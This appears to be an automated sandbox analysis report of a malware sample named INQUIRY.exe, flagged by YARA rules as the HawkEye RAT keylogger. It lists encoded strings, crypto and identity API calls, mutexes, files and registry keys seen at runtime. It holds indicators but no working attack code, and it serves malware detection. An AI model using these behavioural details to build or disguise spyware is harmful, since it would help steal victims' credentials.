                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00420A80 GetLastError,FormatMessageA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00420A80 GetLastError,FormatMessageA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00408B82 GetDiskFreeSpaceA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00408B82 GetDiskFreeSpaceA,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Users\user\Desktop\INQUIRY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmpJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
